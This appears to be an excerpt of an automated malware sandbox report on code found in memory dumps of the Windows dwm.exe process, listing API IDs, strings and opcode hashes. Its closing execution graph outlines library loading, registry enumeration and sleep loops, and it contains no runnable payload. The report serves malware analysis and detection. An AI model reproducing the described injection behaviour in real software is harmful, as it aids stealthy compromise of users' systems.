                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: eeb5cff59d26c32003fe501f4b803576c2cab7f7f7981c682b02dff83c93a369
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 5E31C3B1342A8491FF16DB56AC00FD963B4BB48BA4F991529EDBD0B384EF38C145C348
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: 6ed4381fd626ded7b5ba8bf33f246b5eccc68527b454d27e2806e41128e31580
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: 5E119D32754B9086F7508B52EC58B9972B0F3A8FE4F100224EAAD87794DF78C914C748
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: ebc1bbf581b45de122cafe30d1e99934436c65057704cc0c36b7e959c953cf03
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: 4031C272B42B99C2FB15CF96AC04AE963B0FB54B84F0980209ED817B55EF78D4A1C708
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: e4e5bba7ac7f2c9ed894cdc5bf80ffcd71b3f9adc8b971615d7f4cf3d8faf93f
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: B6018071741A8696FB14DB52A858B9963B1F798FC0F488035CEE983754DF7CC985C304
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: 43faba7026b3e706a1f6197789c4f0c1e9b80fc606f1a8a67a5bf5cb31290ad7
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: 171180B574278582FB249B61EC0DB9A63B0FBA8B95F040429CEA90B754EF7CC108C718
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction ID: 30a97c8e26820279ef6e38b49ada41bcfc43547b8a5eaac171c6c022680db66e
                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction Fuzzy Hash: B85127B27516848AFB18CF95EC48F9937B5F354B88F109120DEAA13788DB75CC81C789
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: c426ee955cf31c563f9250c19877442c6643ab040ed08f960a15f408a37eb9c0
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: C5F04FB234468692FB20CB61FC98B996770F754B88F848024CAD94B954EF6CC688CB04
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: 241c31a1f4866e61d9c678f0abff56c433ba6db0355a2f1a7e56bc2e656afed4
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: E7F08CB0345BC192FB089B53BD09599A230EB98FD0F098131EEEA07B68CF6CC581C708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: 5591f0027bd77789f36fcf12bcf00f00d25ac80df425829cb658f53af96e8c9c
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: 18F082F2352AC591FF488BA0EC88BE42370AB98B80F44241995EB49565CF6CC48CCB18
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: e2482cd66d2799a465b711d3976e0e811f94cc1c255aa086b5275cf2cbedd1e8
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: CD81F03369068489FB509B64CC58FED27B1F768B98F844216DEAA57BD1DB34C442C718
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 015e27c08688d47c0428e5d84959682217638f6f127bf3f2df59713f6161e560
                                                • Instruction ID: eceea85e3ad254ef0497db553e4deb6429b196cf56b25d7d834e2983e81ffb55
                                                • Opcode Fuzzy Hash: 015e27c08688d47c0428e5d84959682217638f6f127bf3f2df59713f6161e560
                                                • Instruction Fuzzy Hash: EE613772159B88C6F7618B45F884B9AB7B0F388754F501116EADE47BA8DB3CC540CF08
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715311866.000001C6CEF40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001C6CEF40000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef40000_dwm.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: f895fb87d25c71b595030c374189c8f1cbe5782c05fcdc6b4692dcfef1583321
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 2C11E533BD6E0041F7A41169EC76BED31706B75374F49C624EAF646BDA8A58EC42C20C
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715105273.000001C6CEEE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEEE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6ceee0000_dwm.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 7faa0711d3ac7450846e3782af0c2022bbc5f75ce36ec11883c4af04835c9b71
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: D1115E33AD5E0903F6A41169FD56BE930616B6C3F4F4A4624AAF646BDB8E1CCC43C20D
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 8bf9bd236d4a6a46a0f0424c35433f4419572b8b95b434b5953a53c2633b98c6
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: B011A533AD4AC102F7A81168EC9EBE914717B74374F184664BBF6167DA8B58CC42C20C
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715311866.000001C6CEF40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001C6CEF40000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef40000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 43fceedfb628e739c75e500f3bdb6e569c041b6239f19088cd34081d5cabc3f6
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: D151D1327526848BFB94DF15EE44F9833B5F351B98F518126EAAA43788EB38CC41C708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715105273.000001C6CEEE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEEE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6ceee0000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: d2c290309888e94f91a6884948b93812683523ca216f000ead077fe505a1f454
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 8B517732652A018BFB14CF25FC44F9937B5F348BD8F5981249A9A47788EB39D842C78C
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715311866.000001C6CEF40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001C6CEF40000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef40000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: 1dce46af4b76d9e69d9164553566d8f592017b7f108f12a4e442ac34a881cfdb
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: 30314772252A8496FB14DF12ED84B9937B4F750BA8F158119FEAA07789EB38C941C708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715105273.000001C6CEEE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEEE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6ceee0000_dwm.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: e2923f8eae84390d0dd1e1d208e1cef3e2627c277d6901d2bf8bfdf3be79ed45
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: F4315472251E408BFB149B12EC44B9937B4F748BD8F198514AE9A07789DB3DC946C78C
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction ID: 1e1562f8ff9f39f77c368a6b852dbf986277bb9c9cf334a67f1f3257bc7f58eb
                                                • Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction Fuzzy Hash: 94115A72A55B99D2FB589FA6B84869A7370F799F80F044129EBEA03714DF78C051CB08
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: 98e394d386d18e6abb614bb5efef06709649f6ea169faf2d3f4d1568f3e9b618
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: 2271E3B22447C986F724DFEA9D44BEA67B1F744B84F840016DEE943B88EE35C604E708
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: bab85156676f63cbb9ee00bf86132f720759c184b547c09a91b4265b6fdeb8e7
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: C651E7722887C982F7349FE9A954BEE6671F3857C0F054025CEEA03BD9DA39C411DB48
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: 799fd7ee2d9807c52d53fe97d3167f88f05785cf5af0206fb32045fc681e5906
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: 8D41A273315A8482FB20DF25E848BEAA7B1F3A8784F804125EE9D87798DB3CC541CB54
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: 14d565a3c13f4acebdba713ec7b8115c98cc747bb9eaebccffc76ef6e1553a00
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: A0113876608BC086EB60CF56B84069AB7B0F7D8B90F944126EEDD83B19DF38C450CB04
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: e080276c791022d28bd33b783591af3751118566b7729b0a99423cb01cbe41f4
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: 9B113A72209B8482EB648B15E84079977E0F788B98F188220DEDD07B68DF3DC951CB44
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: f5ce3698ae6417b497387e4f752cadfd3631085887bdeeaecc22de44b0bfc8d8
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: 4FF082B27507C492FB099F85FC44AD56331AB98BD0F889025A9F903B54CF79C995C718
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715311866.000001C6CEF40000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001C6CEF40000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef40000_dwm.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: 5a746ebe6e445bb51debf2aad7fbf526faaa0f9e02807b0d5330a58ab9a25a7a
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: A7E09232281581A2FB069B51FD50AE432319BA4740F69E022D5FA06392CE38C886D358
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715105273.000001C6CEEE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEEE0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6ceee0000_dwm.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: d8c0ad9571f6bc361fc9189bc75cecf0d9d8f05f692679aae737f575f1c4f239
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: 86E09232280AC593FB049B51FC41AE562319B8C7D4F695021A599072A6DF3CC887C38C
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: acdf6042fb1223443866c5409b429f13857d0b0ce4586bf4caf179bcd8a96ec1
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: 26E06DF12816C592FF084B90FC08ED42232AB98B81F888122D9F906295CF78C855CB18
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: ba62e4c6986bb2080b100d714a19940e8b946af5f39f5813ff9e1ec10b1dd90a
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: 75218E73649B9482FB158FAAA80469AB3B0FB88B94F154114EEDC47B24EF78D542CB04
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2715175146.000001C6CEF10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001C6CEF10000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_1c6cef10000_dwm.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: a05600514fbb28098809f6d24e39dd1a35c03d067d74a3125c8b4a32759ea9c2
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: 5DE065B1A52A41C6F7088FA2DC0878A36F1FB98F01F48C024C99907360DFBDC49ADB80

                                                Execution Graph

                                                Execution Coverage:0.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:68
                                                Total number of Limit Nodes:2
                                                execution_graph 13924 25304f82908 13926 25304f82936 13924->13926 13925 25304f82a2b LoadLibraryA 13925->13926 13926->13925 13927 25304f82aa7 13926->13927 13928 25304fb1c28 13933 25304fb1650 GetProcessHeap HeapAlloc 13928->13933 13930 25304fb1c3e Sleep SleepEx 13931 25304fb1c37 13930->13931 13931->13930 13932 25304fb15c0 StrCmpIW StrCmpW 13931->13932 13932->13931 13977 25304fb1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13933->13977 13935 25304fb1678 13978 25304fb1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13935->13978 13937 25304fb1689 13979 25304fb1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13937->13979 13939 25304fb1692 13980 25304fb1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13939->13980 13941 25304fb169b 13942 25304fb16b6 RegOpenKeyExW 13941->13942 13943 25304fb18ce 13942->13943 13944 25304fb16e8 RegOpenKeyExW 13942->13944 13943->13931 13945 25304fb1711 13944->13945 13946 25304fb1727 RegOpenKeyExW 13944->13946 13981 25304fb12c8 RegQueryInfoKeyW 13945->13981 13948 25304fb174b 13946->13948 13949 25304fb1762 RegOpenKeyExW 13946->13949 13991 25304fb104c RegQueryInfoKeyW 13948->13991 13952 25304fb179d RegOpenKeyExW 13949->13952 13953 25304fb1786 13949->13953 13956 25304fb17c1 13952->13956 13957 25304fb17d8 RegOpenKeyExW 13952->13957 13955 25304fb12c8 16 API calls 13953->13955 13961 25304fb1793 RegCloseKey 13955->13961 13958 25304fb12c8 16 API calls 13956->13958 13959 25304fb17fc 13957->13959 13960 25304fb1813 RegOpenKeyExW 13957->13960 13962 25304fb17ce RegCloseKey 13958->13962 13963 25304fb12c8 16 API calls 13959->13963 13964 25304fb184e RegOpenKeyExW 13960->13964 13965 25304fb1837 13960->13965 13961->13952 13962->13957 13966 25304fb1809 RegCloseKey 13963->13966 13968 25304fb1872 13964->13968 13969 25304fb1889 RegOpenKeyExW 13964->13969 13967 25304fb104c 6 API calls 13965->13967 13966->13960 13970 25304fb1844 RegCloseKey 13967->13970 13971 25304fb104c 6 API calls 13968->13971 13972 25304fb18ad 13969->13972 13973 25304fb18c4 RegCloseKey 13969->13973 13970->13964 13975 25304fb187f RegCloseKey 13971->13975 13974 25304fb104c 6 API calls 13972->13974 13973->13943 13976 25304fb18ba RegCloseKey 13974->13976 13975->13969 13976->13973 13977->13935 13978->13937 13979->13939 13980->13941 13982 25304fb1334 GetProcessHeap HeapAlloc 13981->13982 13983 25304fb1499 RegCloseKey 13981->13983 13984 25304fb135d RegEnumValueW 13982->13984 13985 25304fb1485 GetProcessHeap 